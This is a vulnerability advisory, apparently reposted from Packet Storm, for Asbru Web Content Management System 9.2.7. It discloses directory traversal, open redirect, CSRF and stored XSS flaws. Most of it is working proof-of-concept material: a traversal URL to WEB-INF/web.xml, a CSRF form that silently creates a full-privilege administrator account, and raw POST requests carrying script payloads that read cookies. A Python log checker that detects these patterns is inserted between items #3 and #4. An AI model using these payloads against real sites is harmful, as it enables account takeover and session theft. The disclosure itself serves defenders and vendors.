Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal

2016-04-06T00:00:00
ID PACKETSTORM:136591
Type packetstorm
Reporter LiquidWorm
Modified 2016-04-06T00:00:00

Description

Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities  
  
  
Vendor: Asbru Ltd.  
Product web page: http://www.asbrusoft.com  
Affected version: 9.2.7  
  
Summary: Ready to use, full-featured, database-driven web content management  
system (CMS) with integrated community, databases, e-commerce and statistics  
modules for creating, publishing and managing rich and user-friendly Internet,  
Extranet and Intranet websites.  
  
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request  
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.  
  
Tested on: Apache Tomcat/5.5.23  
           Apache/2.2.3 (CentOS)  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5314  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php  
  
  
09.03.2016  
  
--  
  
  
#1  
Directory Traversal:  
--------------------  
  
http://10.0.0.7/../../../../../WEB-INF/web.xml  
  
  
#2  
Open Redirect:  
--------------  
  
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk  
  
  
#3  
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):  
----------------------------------------------------------------------  
  
<html>  
<body>  
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">  
<input type="hidden" name="userinfo" value="   
<TEST></TEST>   
" />  
<input type="hidden" name="title" value="Mr" />  
<input type="hidden" name="name" value="Chekmidash" />  
<input type="hidden" name="organisation" value="ZSL" />  
<input type="hidden" name="email" value="test@testingus.io" />  
<input type="hidden" name="gender" value="1" />  
<input type="hidden" name="birthdate" value="1984-01-01" />  
<input type="hidden" name="birthday" value="01" />  
<input type="hidden" name="birthmonth" value="01" />  
<input type="hidden" name="birthyear" value="1984" />  
<input type="hidden" name="notes" value="CSRFNote" />  
<input type="hidden" name="userinfo1" value="" />  
<input type="hidden" name="userinfoname" value="" />  
<input type="hidden" name="username" value="hackedusername" />  
<input type="hidden" name="password" value="password123" />  
<input type="hidden" name="userclass" value="administrator" />  
<input type="hidden" name="usergroup" value="" />  
<input type="hidden" name="usertype" value="" />  
<input type="hidden" name="usergroups" value="Account Managers" />  
<input type="hidden" name="usergroups" value="Company Bloggers" />  
<input type="hidden" name="usergroups" value="Customer" />  
<input type="hidden" name="usergroups" value="Event Managers" />  
<input type="hidden" name="usergroups" value="Financial Officers" />  
<input type="hidden" name="usergroups" value="Forum Moderator" />  
<input type="hidden" name="usergroups" value="Human Resources" />  
<input type="hidden" name="usergroups" value="Intranet Managers" />  
<input type="hidden" name="usergroups" value="Intranet Users" />  
<input type="hidden" name="usergroups" value="Newsletter" />  
<input type="hidden" name="usergroups" value="Press Officers" />  
<input type="hidden" name="usergroups" value="Product Managers" />  
<input type="hidden" name="usergroups" value="Registered Users" />  
<input type="hidden" name="usergroups" value="Shop Managers" />  
<input type="hidden" name="usergroups" value="Subscribers" />  
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />  
<input type="hidden" name="usergroups" value="Support Ticket Users" />  
<input type="hidden" name="usergroups" value="User Managers" />  
<input type="hidden" name="usergroups" value="Website Administrators" />  
<input type="hidden" name="usergroups" value="Website Developers" />  
<input type="hidden" name="users_group" value="" />  
<input type="hidden" name="users_type" value="" />  
<input type="hidden" name="creators_group" value="" />  
<input type="hidden" name="creators_type" value="" />  
<input type="hidden" name="editors_group" value="" />  
<input type="hidden" name="editors_type" value="" />  
<input type="hidden" name="publishers_group" value="" />  
<input type="hidden" name="publishers_type" value="" />  
<input type="hidden" name="administrators_group" value="" />  
<input type="hidden" name="administrators_type" value="" />  
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />  
<input type="hidden" name="scheduled_publish_email" value="" />  
<input type="hidden" name="scheduled_notify" value="" />  
<input type="hidden" name="scheduled_notify_email" value="" />  
<input type="hidden" name="scheduled_unpublish" value="" />  
<input type="hidden" name="scheduled_unpublish_email" value="" />  
<input type="hidden" name="invoice_name" value="Icebreaker" />  
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />  
<input type="hidden" name="invoice_address" value="nu" />  
<input type="hidden" name="invoice_postalcode" value="1300" />  
<input type="hidden" name="invoice_city" value="Neverland" />  
<input type="hidden" name="invoice_state" value="ND" />  
<input type="hidden" name="invoice_country" value="ND" />  
<input type="hidden" name="invoice_phone" value="111-222-3333" />  
<input type="hidden" name="invoice_fax" value="" />  
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />  
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />  
<input type="hidden" name="delivery_name" value="" />  
<input type="hidden" name="delivery_organisation" value="" />  
<input type="hidden" name="delivery_address" value="" />  
<input type="hidden" name="delivery_postalcode" value="" />  
<input type="hidden" name="delivery_city" value="" />  
<input type="hidden" name="delivery_state" value="" />  
<input type="hidden" name="delivery_country" value="" />  
<input type="hidden" name="delivery_phone" value="" />  
<input type="hidden" name="delivery_fax" value="" />  
<input type="hidden" name="delivery_email" value="" />  
<input type="hidden" name="delivery_website" value="" />  
<input type="hidden" name="card_type" value="VISA" />  
<input type="hidden" name="card_number" value="4444333322221111" />  
<input type="hidden" name="card_issuedmonth" value="01" />  
<input type="hidden" name="card_issuedyear" value="2016" />  
<input type="hidden" name="card_expirymonth" value="01" />  
<input type="hidden" name="card_expiryyear" value="2100" />  
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />  
<input type="hidden" name="card_cvc" value="133" />  
<input type="hidden" name="card_issue" value="" />  
<input type="hidden" name="card_postalcode" value="1300" />  
<input type="hidden" name="content_editor" value="" />  
<input type="hidden" name="hardcore_upload" value="" />  
<input type="hidden" name="hardcore_format" value="" />  
<input type="hidden" name="hardcore_width" value="" />  
<input type="hidden" name="hardcore_height" value="" />  
<input type="hidden" name="hardcore_onenter" value="" />  
<input type="hidden" name="hardcore_onctrlenter" value="" />  
<input type="hidden" name="hardcore_onshiftenter" value="" />  
<input type="hidden" name="hardcore_onaltenter" value="" />  
<input type="hidden" name="hardcore_toolbar1" value="" />  
<input type="hidden" name="hardcore_toolbar2" value="" />  
<input type="hidden" name="hardcore_toolbar3" value="" />  
<input type="hidden" name="hardcore_toolbar4" value="" />  
<input type="hidden" name="hardcore_toolbar5" value="" />  
<input type="hidden" name="hardcore_formatblock" value="" />  
<input type="hidden" name="hardcore_fontname" value="" />  
<input type="hidden" name="hardcore_fontsize" value="" />  
<input type="hidden" name="hardcore_customscript" value="" />  
<input type="hidden" name="startpage" value="" />  
<input type="hidden" name="workspace_sections" value="" />  
<input type="hidden" name="index_workspace" value="" />  
<input type="hidden" name="index_content" value="" />  
<input type="hidden" name="index_library" value="" />  
<input type="hidden" name="index_product" value="" />  
<input type="hidden" name="index_stock" value="" />  
<input type="hidden" name="index_order" value="" />  
<input type="hidden" name="index_segments" value="" />  
<input type="hidden" name="index_usertests" value="" />  
<input type="hidden" name="index_heatmaps" value="" />  
<input type="hidden" name="index_user" value="" />  
<input type="hidden" name="index_websites" value="" />  
<input type="hidden" name="menu_selection" value="" />  
<input type="hidden" name="statistics_reports" value="" />  
<input type="hidden" name="sales_reports" value="" />  
<input type="submit" value="Initiate" />  
</form>  
</body>  
</html>  
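Defender-side example added here, not part of the advisory or of the vendor's code: a Python checker that runs over Apache combined-format access log lines and flags the three request patterns visible from the URL in items #1 to #3 above (traversal aimed at WEB-INF, login_post.jsp redirecting off-host, and a POST to an admin create_post.jsp endpoint without a same-host Referer). The sample log lines, the SITE_HOST value and the hostnames in them are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Apache "combined" log format; only the fields the checks need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
SITE_HOST = "10.0.0.7"  # host used in the advisory; set this to your own vhost

def _is_external(url: str) -> bool:
    """True when a redirect target leaves SITE_HOST (absolute URL, foreign scheme, or //host form)."""
    u = unquote(url).strip()
    if u.startswith(("//", "\\\\", "/\\")):  # protocol-relative and backslash variants
        return True
    parts = urlsplit(u)
    if parts.scheme or parts.netloc:
        return (parts.hostname or "") != SITE_HOST
    return False

def classify(line: str) -> list:
    """Findings for one log line: #1 traversal, #2 open redirect, #3 cross-origin admin POST."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m["target"])
    path = unquote(parts.path)  # decode once; traversal may arrive as ..%2f
    findings = []
    if "/../" in path and "WEB-INF" in path.upper():
        findings.append("traversal")
    if path.endswith("/login_post.jsp") and any(
            _is_external(u) for u in parse_qs(parts.query).get("url", [])):
        findings.append("open_redirect")
    if (m["method"] == "POST" and path.startswith("/webadmin/")
            and path.endswith("create_post.jsp")
            and (urlsplit(m["referer"]).hostname or "") != SITE_HOST):
        findings.append("csrf_suspect")  # Referer absent or from another host
    return findings

def scan(lines):
    """Index -> findings for every flagged line; clean lines are omitted."""
    return {i: f for i, f in ((i, classify(l)) for i, l in enumerate(lines)) if f}

# Constructed sample lines in combined format (not from the advisory).
SAMPLE_LOG = [
    '10.0.0.99 - - [09/Mar/2016:13:29:01 +0100] "GET /../../../../../WEB-INF/web.xml HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '10.0.0.99 - - [09/Mar/2016:13:29:05 +0100] "GET /login_post.jsp?url=http://www.zeroscience.mk HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.50 - - [09/Mar/2016:13:30:10 +0100] "POST /webadmin/users/create_post.jsp?id=&redirect= HTTP/1.1" 302 0 "http://third-party.example/page.html" "Mozilla/5.0"',
    '10.0.0.50 - - [09/Mar/2016:13:31:00 +0100] "POST /webadmin/users/create_post.jsp?id=&redirect= HTTP/1.1" 302 0 "http://10.0.0.7/webadmin/users/create.jsp" "Mozilla/5.0"',
]
```

Running `scan(SAMPLE_LOG)` flags lines 0, 1 and 2; the last line, the same POST with a Referer from the CMS's own admin page, is left alone.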
  
  
#4  
Stored Cross-Site Scripting:  
----------------------------  
  
a)  
  
  
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1  
Host: 10.0.0.7  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="webeditor_stylesheet"  
  
/stylesheet.jsp?id=1,1&device=&useragent=&  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="restore"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="archive"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="publish"  
  
Save & Publish  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="scheduled_publish"  
  
2016-03-09 13:29  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="scheduled_unpublish"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="checkedout"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="revision"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="title"  
  
"><script>alert(document.cookie)</script>  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="searchable"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="menuitem"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="file"; filename="test.svg"  
Content-Type: image/svg+xml  
  
testsvgxxefailed  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="file_data"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="server_filename"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contentdelivery"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="image1"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="image2"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="image3"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="metainfo"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="segmentation"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="author"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="description"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="keywords"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="metainfoname"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="segmentationname"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="segmentationvalue"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contentpackage"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contentclass"  
  
image  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contentgroup"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="contenttype"  
  
Photos  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="version_master"  
  
0  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="version"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="device"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="usersegment"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="usertest"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="users_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="users_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="users_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="creators_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="creators_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="creators_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="editors_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="editors_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="editors_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="publishers_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="publishers_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="publishers_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="developers_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="developers_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="developers_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="administrators_group"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="administrators_type"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="administrators_users"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_top"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_up"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_previous"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_next"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_first"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="page_last"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="related"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN  
Content-Disposition: form-data; name="selectrelated"  
  
  
------WebKitFormBoundarygqlN2AtccVFqx0YN--  
  
  
b)  
  
POST /webadmin/fileformats/create_post.jsp HTTP/1.1  
Host: 10.0.0.7  
  
filenameextension="><script>alert(document.cookie)</script>  
  